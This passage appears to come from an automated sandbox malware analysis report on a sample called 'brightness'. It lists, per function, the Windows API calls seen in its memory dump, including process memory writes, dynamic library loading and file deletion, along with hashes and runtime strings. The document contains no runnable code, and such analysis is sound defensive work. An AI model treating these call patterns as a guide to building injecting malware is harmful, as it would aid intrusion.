                  • Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                • String ID: BCryptVerifySignature$bcrypt
                • API String ID: 1002360270-4067648912
                • Opcode ID: 5b86e1d96a044001ea7b0d9b2419f05cc33aee9b61ab52e1a3bdb57d2bb10b69
                • Instruction ID: f37b6aa270519d87fafe9bfe44fec8b345f8c35ee64ee73a60c36cc1218b0175
                • Opcode Fuzzy Hash: 5b86e1d96a044001ea7b0d9b2419f05cc33aee9b61ab52e1a3bdb57d2bb10b69
                • Instruction Fuzzy Hash: 6CF0F671F8D3389EE310AF6DA884F36379CA786F14F00092ABE18C7180D77458208B50
                APIs
                  • Part of subcall function 028F4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4EDA
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DFD2), ref: 0290DF3F
                • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DF79
                • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DFA6
                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DFAF
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                • String ID:
                • API String ID: 3764614163-0
                • Opcode ID: 8dfa724e05a6b120aac6601a331163c5ff0193b98602ab32b8b0d5b10bced1f2
                • Instruction ID: f6f17c8f1f7cf11f7033f84dbd39064f032e2b680eca035de6a8fa93f4979535
                • Opcode Fuzzy Hash: 8dfa724e05a6b120aac6601a331163c5ff0193b98602ab32b8b0d5b10bced1f2
                • Instruction Fuzzy Hash: 9C21AA76A4020DBEEB50EAE4CD86F9EB7BDEB44B00F504562B700F61D0D7B4AA048A65
                APIs
                • RtlInitUnicodeString.NTDLL(?,?), ref: 0290DEA0
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DEF2), ref: 0290DEB6
                • NtDeleteFile.NTDLL(?), ref: 0290DED5
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Path$DeleteFileInitNameName_StringUnicode
                • String ID:
                • API String ID: 1459852867-0
                • Opcode ID: e3d16f670cc4c521b86b03359e01da16fbed6ed0f94aef91e9cb11af0f13b8ef
                • Instruction ID: c9d7cbddc25c970a76ea05ce549ac8af789433c0cd966e58bddb8114c02eb329
                • Opcode Fuzzy Hash: e3d16f670cc4c521b86b03359e01da16fbed6ed0f94aef91e9cb11af0f13b8ef
                • Instruction Fuzzy Hash: 7D014F76A4424C6EEB05E6E08DC1BCEB7B9EF94700F5004E2A200E60D1DA746B088B31
                APIs
                  • Part of subcall function 028F4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4EDA
                • RtlInitUnicodeString.NTDLL(?,?), ref: 0290DEA0
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DEF2), ref: 0290DEB6
                • NtDeleteFile.NTDLL(?), ref: 0290DED5
                  • Part of subcall function 028F4C0C: SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                • String ID:
                • API String ID: 1694942484-0
                • Opcode ID: d129fd8116cc080f03c2d81562d8f9fc9074643bb8d881800e0327259170ea18
                • Instruction ID: 838a7835625c2b0180434bcf59229959178f2625dfba53b92f9dd70e01479fc1
                • Opcode Fuzzy Hash: d129fd8116cc080f03c2d81562d8f9fc9074643bb8d881800e0327259170ea18
                • Instruction Fuzzy Hash: 9301E17594020CAEEB11EAE4CD81FDEB3BDDB98700F5044A2A704E25C0EB746B049A75
                APIs
                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028F7F75
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: DiskFreeSpace
                • String ID:
                • API String ID: 1705453755-0
                • Opcode ID: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                • Instruction ID: ee3196001682250348e113fbbcf0071aa664086810ffc21b4ecbbf884292e7f1
                • Opcode Fuzzy Hash: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                • Instruction Fuzzy Hash: 731100B5A00209AF9B44CF9DC8809AFF7F9EFC8304B14C569A508EB254E6319A018B90
                APIs
                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                • Instruction ID: f045e92f734f4c510a34be3b06ca9de1cf7b1f17b44f976a8912b1f492594a3c
                • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                • Instruction Fuzzy Hash: ABE0927D70421817D355A56C9C80DE7736D975C710F10426AAB49C7341EDA09D444AE5
                APIs
                • GetVersionExA.KERNEL32(?,0291D106,00000000,0291D11E), ref: 028FB71A
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: d7c976edfb19456290c99c0d5dd0c204742e3814f689ad9fab5e1a009d25843f
                • Instruction ID: e0bec6a21f7ba2c65a6f17e82abf623263ffd2e4accaac936580694ab64eb182
                • Opcode Fuzzy Hash: d7c976edfb19456290c99c0d5dd0c204742e3814f689ad9fab5e1a009d25843f
                • Instruction Fuzzy Hash: 61F0A4789483069FE394DF29D540A2677E9FF49714F004D29EAE9C7380E7349414CF52
                APIs
                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028FBDF2,00000000,028FC00B,?,?,00000000,00000000), ref: 028FA7A3
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                • Instruction ID: ed9cfff661846aedbdcbdafee958a53152297682b6736eb8c629476247d23d17
                • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                • Instruction Fuzzy Hash: 02D05EAE30E2602AA224915B2D84D7B5BFCCAC57B1F00413EF68CC6201D2048C0596F1
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: LocalTime
                • String ID:
                • API String ID: 481472006-0
                • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                • Instruction ID: 29e6ae53313c1002136837f493ef77d49cc9a46ee7208dae354d03b3527cf5d3
                • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                • Instruction Fuzzy Hash: E3A01108808830028A803B2C0C0223A3288A800A20FC80F80A8F8802E2FE2E022080E3
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                APIs
                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028FD21D
                  • Part of subcall function 028FD1E8: GetProcAddress.KERNEL32(00000000), ref: 028FD201
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                • API String ID: 1646373207-1918263038
                • Opcode ID: 457d71123bd7eb687d07ee989b04f3ae0a28071ccb23f033f81ee21b33d0b9ab
                • Instruction ID: affbcf3d5719f448bafed88a03a7cee67a77061e8996971d1c6e3aafe4976ed6
                • Opcode Fuzzy Hash: 457d71123bd7eb687d07ee989b04f3ae0a28071ccb23f033f81ee21b33d0b9ab
                • Instruction Fuzzy Hash: 3841936EF883185BD68CAB6D7400427BF9DD6987103A0841BFB04CB744DEA07E995B6A
                APIs
                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02906E5E
                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02906E6F
                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02906E7F
                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02906E8F
                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02906E9F
                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02906EAF
                • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02906EBF
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                • API String ID: 667068680-2233174745
                • Opcode ID: 09132a0de7ec6b043d61ae894710831bcf23327d6bfa17e4ff0e30919db63de8
                • Instruction ID: 1b3370d375e9555e3dfc35b3b3e3d9374a6d44537bd162c58007a3052e27a610
                • Opcode Fuzzy Hash: 09132a0de7ec6b043d61ae894710831bcf23327d6bfa17e4ff0e30919db63de8
                • Instruction Fuzzy Hash: A4F050EDAC93296EB3407F799CC18372B9DED80B0471019257A62955C3FB79C4348F62
                APIs
                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028F28CE
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Message
                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                • API String ID: 2030045667-32948583
                • Opcode ID: 192077654c6fac23814f18b27f6974d0562bd89515160c65744d80855103151a
                • Instruction ID: ae8c5ce372055554c8aefb0470976875c33295be72b0cd761154d0917301e631
                • Opcode Fuzzy Hash: 192077654c6fac23814f18b27f6974d0562bd89515160c65744d80855103151a
                • Instruction Fuzzy Hash: 17A1E53CB042688BDBA1AA2CCC80BD9B7E5EB09314F1441E5DE4DDB28ACB7599C5CF51
                Strings
                • bytes: , xrefs: 028F275D
                • An unexpected memory leak has occurred. , xrefs: 028F2690
                • 7, xrefs: 028F26A1
                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 028F2849
                • Unexpected Memory Leak, xrefs: 028F28C0
                • , xrefs: 028F2814
                • The unexpected small block leaks are:, xrefs: 028F2707
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID:
                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                • API String ID: 0-2723507874
                • Opcode ID: 7498970b259ca7980d63c43121190f52708605035c9f17725d96276152fb36e1
                • Instruction ID: 24a5ecf6f8801e72f6ef8cd9a6af3871800727eea30380ead6345f3ef6b55765
                • Opcode Fuzzy Hash: 7498970b259ca7980d63c43121190f52708605035c9f17725d96276152fb36e1
                • Instruction Fuzzy Hash: 7A71D33CB042988FDBA19A2CCC84BD8BBE5EB09314F1041E5DA4DDB28ADB7559C5CF52
                APIs
                • GetThreadLocale.KERNEL32(00000000,028FC00B,?,?,00000000,00000000), ref: 028FBD76
                  • Part of subcall function 028FA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Locale$InfoThread
                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                • API String ID: 4232894706-2493093252
                • Opcode ID: 5ce5e5d5d429b7137288fa5b7d0286ef6f60677ccb8f1883c2a18e503839caf5
                • Instruction ID: 7b41a7baf7cf0f13e338e61a2d25f9bff165f3e5211d20c70146a94ae1dab1d8
                • Opcode Fuzzy Hash: 5ce5e5d5d429b7137288fa5b7d0286ef6f60677ccb8f1883c2a18e503839caf5
                • Instruction Fuzzy Hash: 0B61513CB002489BDB84EBACD850BDF77B7DB88300F1094369705DB745DA39DA1A9B66
                APIs
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AE38
                • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0290AE4F
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AEE3
                • IsBadReadPtr.KERNEL32(?,00000002), ref: 0290AEEF
                • IsBadReadPtr.KERNEL32(?,00000014), ref: 0290AF03
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Read$HandleModule
                • String ID: KernelBase$LoadLibraryExA
                • API String ID: 2226866862-113032527
                • Opcode ID: 3d9ac90a2179532ec7f787a63243ff6e8f4e48d34a914843ffa9f18c21914139
                • Instruction ID: 9cff3d0bb42cd84e5528063318d9682f890afb6aaf3657d8bbfc056436959421
                • Opcode Fuzzy Hash: 3d9ac90a2179532ec7f787a63243ff6e8f4e48d34a914843ffa9f18c21914139
                • Instruction Fuzzy Hash: B7311CB6A40309AFDB20DB68CCC5F9A77ACAF04764F004520EB54DB2C1D774A940CBE1
                APIs
                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?,029517C8,?,?,0291E7A8,028F655D,0291D30D), ref: 028F4365
                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?,029517C8,?,?,0291E7A8,028F655D,0291D30D), ref: 028F436B
                • GetStdHandle.KERNEL32(000000F5,028F43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?,029517C8), ref: 028F4380
                • WriteFile.KERNEL32(00000000,000000F5,028F43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F43F3,?,?), ref: 028F4386
                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028F43A4
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: FileHandleWrite$Message
                • String ID: Error$Runtime error at 00000000
                • API String ID: 1570097196-2970929446
                • Opcode ID: fa5469ef51a0dd91d32e922f8fb1e5a138c0b310d5d4ef060aa6016cc2a61fb8
                • Instruction ID: 1352a73204b6a299102d4ddb069d7223bba72d5f2fb405443a156de7378fa2e3
                • Opcode Fuzzy Hash: fa5469ef51a0dd91d32e922f8fb1e5a138c0b310d5d4ef060aa6016cc2a61fb8
                • Instruction Fuzzy Hash: A8F0B46DAC8345B9FA50A264AC09FAA279C4B84F20F584A06BB68E44C0C7A450C48B67
                APIs
                  • Part of subcall function 028FACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FACD9
                  • Part of subcall function 028FACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FACFD
                  • Part of subcall function 028FACBC: GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD18
                  • Part of subcall function 028FACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FADAE
                • CharToOemA.USER32(?,?), ref: 028FAE7B
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028FAE98
                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAE9E
                • GetStdHandle.KERNEL32(000000F4,028FAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAEB3
                • WriteFile.KERNEL32(00000000,000000F4,028FAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAEB9
                • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028FAEDB
                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 028FAEF1
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
